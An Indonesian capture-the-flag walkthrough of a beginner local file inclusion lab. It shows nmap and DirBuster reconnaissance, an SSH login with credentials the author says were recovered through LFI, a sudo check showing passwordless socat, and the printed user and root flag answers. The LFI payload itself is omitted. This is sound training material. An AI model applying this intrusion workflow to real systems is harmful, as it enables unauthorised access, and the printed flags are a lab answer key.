LFI Inclusion

Tantangan LFI tingkat pemula

Task 1 # Deploy

Ini adalah ruang tingkat pemula yang dirancang untuk orang yang ingin terbiasa dengan kerentanan penyertaan file Lokal.

Terapkan mesin dan mulai menghitung.

Task 2 # Root It

Jika Anda telah menerapkan VM, coba temukan parameter LFI dan dapatkan tanda pengguna dan root.

Oke mari kita selesaikan tantangannya. Pertama-tama kita mencari tahu service port apa saja yang terbuka alias Open dengan melakukan scanning port dengan nmap.

┌─[cyber@cyber]─[~]
└──╼ $sudo nmap -sV -sC -Pn 10.10.0.114
[sudo] password for cyber: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-14 20:24 WIT
Nmap scan report for 10.10.0.114
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT  STATE SERVICE VERSION
22/tcp open ssh    OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|  2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|  256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open http   Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.10 seconds

Sesuai dengan scanning port di atas kita menemukan 2 port yang terbuka:

22 = ssh

80 = http

Selanjutnya ketikan ip manchne ke browser.

Setelah itu lakukan pencarian direktori yang terdapat pada url dengan tools Dirbuster.

┌─[✗]─[cyber@cyber]─[~]
└──╼ $dirbuster 
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: / - 200
File found: /article - 500

Selanjutnya ketikan dirktori /article di url

Akan menampilkan pesan Internal Server Error, jadi disinilah letak bugs. Untuk penggunaan LFI libih jauh kunjungi website Acunetix.

Ketikan perintah FLI-nya

Dari inputan LFI diatas menampilkan file sistem yaitu passwd dan juga menampilkan user dan password untuk login ssh, mari kita lihat sistemnya.

┌─[cyber@cyber]─[~]
└──╼ $sudo ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management:    https://landscape.canonical.com
 * Support:       https://ubuntu.com/advantage

 System information as of Sun Mar 14 18:27:34 IST 2021

 System load: 0.0              Processes:          88
 Usage of /:  34.8% of 9.78GB  Users logged in:    0
 Memory usage: 72%              IP address for eth0: 10.10.0.114
 Swap usage:  0%
 * Canonical Livepatch is available for installation.
  - Reduce system reboots and improve kernel security. Activate at:
    https://ubuntu.com/livepatch

3 packages can be updated.
3 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Mar 14 16:33:13 2021 from 10.9.169.148
falconfeast@inclusion:~$ ls
articles linpeas.sh user.txt
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
   env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User falconfeast may run the following commands on inclusion:
   (root) NOPASSWD: /usr/bin/socat
falconfeast@inclusion:~$ id
uid=1000(falconfeast) gid=1000(falconfeast) groups=1000(falconfeast),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
falconfeast@inclusion:~$ cat user.txt 
60989655118397345799
falconfeast@inclusion:~$ ls /root/root.txt
ls: cannot access '/root/root.txt': Permission denied
falconfeast@inclusion:~$ 

kita sudah menemukan flag user dan sekarang kita mencari flag root

Answer = 60989655118397345799

Karna flag root memilki izin, jadi kita gunakan LFI

Tassss.. dapat...

Ansaware = 42964104845495153909

Finish..

Okey.. thansk sudah membaca..